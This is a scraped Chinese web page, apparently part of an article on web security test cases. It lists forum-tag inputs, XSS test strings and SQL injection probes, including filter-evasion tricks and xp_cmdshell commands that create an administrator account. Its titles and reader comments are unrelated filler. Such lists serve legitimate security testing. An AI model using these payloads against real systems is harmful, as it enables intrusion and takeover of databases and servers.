b2科目四模拟试题多少题驾考考爆了怎么补救
b2科目四模拟试题多少题 驾考考爆了怎么补救

多线程如何避免死锁 web安全性测试用例(2)

电脑杂谈  发布时间:2018-02-08 22:13:32  来源:网络整理

[u]一二三四五六七北京市[/u]

[font=微软雅黑"]一二三四五六七北京市[/font]

[size=4"]一二三四五六七北京市[/size]

[color=Red"]一二三四五六七北京市[/color]

[align=center"]一二三四五六七北京市[/align]

[float=left"]一二三四五六七北京市[/float]

[font=微软雅黑]一二三四五六七北京市[/font]

[size=4]一二三四五六七北京市[/size]

[color=Red]一二三四五六七北京市[/color]

[align=center]一二三四五六七北京市[/align]

[list=1]

[*]一二三四五六七北京市[/list]

[indent]一二三四五六七北京市[/indent]

[float=left]一二三四五六七北京市[/float]

[media=ra,400,300,0]?forumid=109[/media]

2. 输出编码

常用的测试输入语句有:

<input type="text"/>

<input/>

<input/

<script>alert(‘hello‘);</script>

1.jpg"left">"></a><script>alert(‘xss’);</script>

‘;alert(‘xss‘);var/ a=‘a

‘”>xss&<

a=”\” ; b=”;alert(/xss/);//”

<img src=“输出内容” border=“0” alt=“logo” />

“’”

‘”’

“””

“ “ “

“”“

“‘ ”

title=””

对输出数据到输出数据的对比,看是否出现问题。

3. 防止SQL注入

Admin--

‘or -------

‘ and ( ) exec insert * % chr mid

and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2

‘and 1=1 ; ‘And 1=1 ; ‘aNd 1=1 ;

and 1=2 ; ‘and 1=2

and 2=2

and user>0

and (select count(*) from sysobjects)>0

and (select count(*) from msysobjects)>0

and (Select Count(*) from Admin)>=0

and (select top 1 len(username) from Admin)>0(username 已知字段)

;exec master..xp_cmdshell “net user name password /add”—

;exec master..xp_cmdshell “net localgroup name administrators /add”—

and 0<>(select count(*) from admin)

简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。


本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-67715-2.html

相关阅读
    发表评论  请自觉遵守互联网相关的政策法规,严禁发布、暴力、反动的言论

    • 黄彭太
      黄彭太

      肯定不会让我们失望的

    • 刘品之
      刘品之

      也就是看是否属于无害通过

    • 欧明玉
      欧明玉

      机巡航南海中国岛礁12海里

    热点图片
    拼命载入中...